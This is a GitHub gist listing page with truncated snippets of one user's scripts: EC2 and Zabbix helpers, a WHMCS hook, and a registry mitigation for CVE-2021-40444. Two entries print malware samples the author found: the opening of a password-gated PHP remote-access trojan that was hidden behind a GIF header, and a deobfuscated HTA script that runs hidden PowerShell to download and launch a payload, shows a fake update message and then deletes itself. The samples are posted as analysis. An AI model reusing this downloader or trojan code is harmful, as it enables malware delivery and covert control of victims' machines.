@jwieder
jwieder / get-my-ec2-hostname.bash
Created September 25, 2021 15:25
This is a very hacky bash script to help get the publicly assigned hostname of an ec2 instance.
#!/bin/bash
### this is a very hacky bash script to help get the publicly assigned hostname of an ec2 instance.
### it will only work with instances within us-east-1 because we aren't checking region, amazonaws suffix, etc.
# Get my public IP
publicIP=$(curl -s whatismyip.akamai.com)
# Make up AWS EC2 host name with public DNS
publicName=ec2-${publicIP//./-}.us-east-1.compute.amazonaws.com
version: '3.7'
services:
  web:
    image: django:latest
    command: gunicorn hello_django.wsgi:application --bind 0.0.0.0:8000
    volumes:
      - static_volume:/home/app/web/staticfiles
      - media_volume:/home/app/web/mediafiles
    ports:
@jwieder
jwieder / CVE-2021-40444_mitigation.reg
Created September 13, 2021 15:33
BACKUP YOUR REGISTRY FIRST. This gist mitigates CVE-2021-40444 using a registry key that automates steps from https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-40444.
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
"1001"=dword:00000003
"1004"=dword:00000003
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1]
"1001"=dword:00000003
"1004"=dword:00000003
@jwieder
jwieder / creditBalanceSidebar.php
Last active July 4, 2021 08:32
Place this hook script in the includes/hooks/ directory of the WHMCS folder within your server's webroot to display each client's available credit balance as a sidebar item within the WHMCS Client Area homepage and billing-related pages. Created by combining elements from two scripts from the WHMCS forums and fixing several issues with both. Tes…
<?php
/**
* Display Client's Credit Balance as a Sidebar Item in Client Area Homepage and Billing-related Pages
*
* @author Josh Wieder
* @link https://gist.github.com/jwieder/3d470a4e85e041ca41bc2cee0c5aa7a8#file-creditbalancesidebar-php
* @since WHMCS v6.0.0+
*/
@jwieder
jwieder / fpingperm.sh
Created April 29, 2017 17:12
A simple shell script that will restore the permissions to fping & fping6 required by Zabbix following an update or other system change. I use this as part of a daily cron. NOTE: this is designed for RHEL/CentOS, and assumes that you are running Zabbix from a group named "zabbix".
#!/bin/bash
x=0
y=0
if [ -e /usr/sbin/fping ]
then
if [ `stat -c %a:%G /usr/sbin/fping` == "6710:zabbix" ]
then
echo "Sticky bit assigned and owner set"
@jwieder
jwieder / gif-embedded-RAT-v1425.php
Created April 15, 2017 14:14
This is the source code for a RAT I found. The RAT was rot-13 encoded, and contained a standard six byte .GIF header. The idea being to upload the file as an attachment for a form or other program that allows such foolishness. I found the revision number interesting.
/*
* REVISION: $Rev: 1426 $
*/
if (md5(md5($_REQUEST['hhh'])) == 'bc5aaff98e1783e8e30f266af63cea42') {
set_time_limit(36000);
function unslash_rec(&$arr)
{
reset($arr);
while (list($key) = each($arr))
@jwieder
jwieder / stateNameCoversion.php
Created September 19, 2016 17:23
PHP script to convert a text file of two letter state abbreviations into full text names. You can replace the $us_state_abbrev array with just about any one-dimensional array to convert whatever you want (countries, etc). You can also easily change this so that full state names are converted to two-state codes.
<?php
/*
* Replace list.txt with the name of your file. The file should only include a list of two-letter state abbreviations, one on each line.
* Results printed to STDIO, so use pipes to dump to a file if you want to save the results or add a function to do the same thing (I was
* using this for CLI use which is why a function isn't in here already)
*
* Josh Wieder
* https://consulting.joshwieder.net
*/
@jwieder
jwieder / chrome_patch-DEobfuscated.hta
Last active July 30, 2016 16:02
DEobfuscated version of a malicious script used to force victims to download a separate payload file 524.dat
try {
moveTo(-100, -100);
resizeTo(0, 0);
a = new ActiveXObject('Wscript.Shell');
a.Run("PowerShell -WindowStyle Hidden $d=$env:temp+'g2924808f66985de3a9ad1e3d743e0d.exe';(New-Object System.Net.WebClient).DownloadFile(' https://website.ext/17/524.dat',$d);Start-Process $d;[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[system.windows.forms.messagebox]::show('Update complete.','Information',[Windows.Forms.MessageBoxButtons]::OK, [System.Windows.Forms.MessageBoxIcon]::Information);", 0, false);
var b = new ActiveXObject('Scripting.FileSystemObject');
var p = document.location.href;
p = unescape(p.substr(8));
if (b.FileExists(p)) b.DeleteFile(p);
} catch (e) {}
@jwieder
jwieder / chrome_patch-obfuscated.hta
Created July 30, 2016 15:42
obfuscated version of a malicious script used to force victims to download a separate payload file 524.dat